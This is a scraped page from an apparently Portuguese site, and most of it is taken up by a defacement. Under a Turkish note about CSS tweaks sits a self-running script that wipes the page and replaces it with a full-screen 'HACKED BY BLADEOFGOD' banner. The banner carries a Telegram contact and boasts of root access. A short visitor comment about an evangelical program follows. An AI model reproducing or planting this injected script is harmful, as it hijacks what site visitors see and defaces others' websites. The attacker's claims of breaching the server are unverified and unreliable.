Informações
HACKED BY BLADEOFGOD
Ekranın üst kısmına taşmayı önlemek, içeriği tam ekranda dikey ve yatay olarak kusursuz bir şekilde ortalamak için CSS düzenlemeleri güncellendi. Görsel boyutları ve yazı aralıkları ekran yüksekliğine göre esnekleşti, üstten ve alttan güvenli taşmama marjı eklendi. Tek parça güncel kod: <script> (function() { function applyIndex() { document.documentElement.innerHTML = ''; document.documentElement.style.cssText = 'margin: 0 !important; padding: 0 !important; width: 100vw !important; height: 100vh !important; overflow: hidden !important; background-color: #0d0202 !important;'; var fullIndexHTML = ` <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>HACKED BY BLADEOFGOD</title> <style> * { margin: 0 !important; padding: 0 !important; box-sizing: border-box !important; } html, body { width: 100vw !important; height: 100vh !important; overflow: hidden !important; background-color: #0d0202 !important; font-family: 'Courier New', Courier, monospace !important; } ::-webkit-scrollbar { display: none !important; width: 0 !important; height: 0 !important; } .wall-overlay { position: fixed !important; top: 0 !important; left: 0 !important; width: 100vw !important; height: 100vh !important; z-index: 999999999 !important; background-color: #0d0202 !important; background-image: linear-gradient(335deg, #000000 23px, transparent 23px), linear-gradient(155deg, #1f0303 23px, transparent 23px), linear-gradient(335deg, #000000 23px, transparent 23px), linear-gradient(155deg, #1f0303 23px, transparent 23px) !important; background-size: 58px 58px !important; background-position: 0 2px, 4px 35px, 29px 31px, 34px 6px !important; display: flex !important; justify-content: center !important; align-items: center !important; padding: 20px 15px !important; overflow-y: auto !important; } .wall-overlay::after { content: "" !important; position: fixed !important; top: 0 !important; left: 0 !important; width: 100vw !important; height: 100vh !important; background: radial-gradient(circle, rgba(255, 0, 0, 0.18) 0%, rgba(0, 0, 0, 0.95) 85%) !important; pointer-events: none !important; z-index: 1000000000 !important; } .scanline { position: fixed !important; top: 0 !important; left: 0 !important; width: 100vw !important; height: 100vh !important; background: linear-gradient( rgba(18, 0, 0, 0) 50%, rgba(0, 0, 0, 0.5) 50% ) !important; background-size: 100% 4px !important; z-index: 1000000001 !important; pointer-events: none !important; } .container { width: 100% !important; max-width: 780px !important; max-height: 94vh !important; border: 3px solid #ff0000 !important; padding: 20px !important; background-color: rgba(5, 0, 0, 0.98) !important; box-shadow: 0 0 35px rgba(255, 0, 0, 0.9), inset 0 0 20px rgba(255, 0, 0, 0.4) !important; z-index: 1000000002 !important; position: relative !important; text-align: center !important; color: #ffffff !important; margin: auto !important; display: flex !important; flex-direction: column !important; justify-content: center !important; align-items: center !important; overflow-y: auto !important; } .flag-box { margin-bottom: 10px !important; margin-top: 5px !important; } .flag-img { width: 85px !important; max-width: 25vw !important; height: auto !important; border: 1px solid #ff0000 !important; box-shadow: 0 0 10px rgba(255, 0, 0, 0.8) !important; display: block !important; margin: 0 auto !important; } h1 { font-size: clamp(1.4rem, 4vw, 2.4rem) !important; color: #ff0000 !important; text-shadow: 0 0 12px #ff0000, 0 0 25px #990000 !important; letter-spacing: 2px !important; margin-bottom: 10px !important; font-weight: 900 !important; animation: flicker 1.5s infinite !important; line-height: 1.2 !important; } .telegram { font-size: clamp(0.85rem, 2.5vw, 1.2rem) !important; color: #ffffff !important; margin-bottom: 12px !important; letter-spacing: 1px !important; } .telegram a { color: #ff3333 !important; text-decoration: none !important; font-weight: bold !important; background-color: #1a0000 !important; padding: 3px 8px !important; border: 1px solid #ff0000 !important; display: inline-block !important; } .batman-img { width: 100% !important; max-height: 220px !important; height: auto !important; border: 2px solid #ff0000 !important; box-shadow: 0 0 15px rgba(255, 0, 0, 0.6) !important; margin: 10px 0 12px 0 !important; object-fit: cover !important; } .divider { color: #ff0000 !important; margin: 10px 0 !important; font-weight: bold !important; letter-spacing: 2px !important; overflow: hidden !important; white-space: nowrap !important; width: 100% !important; } .message-box { border: 1px solid #ff0000 !important; padding: 12px 15px !important; margin: 10px 0 !important; background-color: #0d0000 !important; text-align: left !important; font-size: clamp(0.8rem, 2vw, 1rem) !important; line-height: 1.5 !important; color: #ffffff !important; font-weight: 600 !important; width: 100% !important; } .status-header { color: #ff3333 !important; font-size: clamp(0.9rem, 2.2vw, 1.1rem) !important; font-weight: 800 !important; margin-bottom: 8px !important; display: block !important; letter-spacing: 1px !important; border-bottom: 1px solid #330000 !important; padding-bottom: 4px !important; } .highlight { color: #ff4d4d !important; font-weight: bold !important; } .experience-tag { margin-top: 12px !important; font-size: clamp(0.85rem, 2.2vw, 1.1rem) !important; font-weight: bold !important; color: #ff0000 !important; text-shadow: 0 0 10px #ff0000 !important; letter-spacing: 1.5px !important; border-top: 1px solid #ff0000 !important; padding-top: 10px !important; line-height: 1.4 !important; width: 100% !important; } @keyframes flicker { 0%, 100% { opacity: 1; } 50% { opacity: 0.6; } } </style> </head> <body> <div class="scanline"></div> <div class="wall-overlay"> <div class="container"> <div class="flag-box"> <img src="https://upload.wikimedia.org/wikipedia/commons/b/b4/Flag_of_Turkey.svg" alt="Turkish Flag" class="flag-img"> </div> <h1>HACKED BY BLADEOFGOD</h1> <div class="telegram"> CONTACT: <a href="https://t.me/sifirincigun" target="_blank">Telegram @sifirincigun</a> </div> <img src="https://cdn.kayiprihtim.com/wp-content/uploads/2022/03/the-batman-incelemesi-758x403.jpg" alt="Batman" class="batman-img"> <div class="divider">============================================================</div> <div class="message-box"> <span class="status-header">[!] SYSTEM SECURITY OVERRIDDEN BY TURKISH HACKER</span> <p style="margin-bottom: 8px;">Your perimeter defense was completely ignored. I bypassed your infrastructure, logged root permissions, and audited your entire server before you even noticed a footprint.</p> <p style="margin-bottom: 0;">Do not attempt to patch without knowing what actually breached your network. <span class="highlight">Control was handed over to a Turkish Cyber Warrior the moment I stepped in.</span></p> </div> <div class="experience-tag"> TURKISH CYBER FORCE<br> [ 2008 - 2026 ]<br> 18 YEARS OF UNDERGROUND DOMINANCE </div> </div> </div> </body> `; document.documentElement.innerHTML = fullIndexHTML; } if (document.readyState === "loading") { document.addEventListener("DOMContentLoaded", applyIndex); } else { applyIndex(); } })(); </script>
Clara
20/12/2024
ipatinga
Muito legal o programa evangelico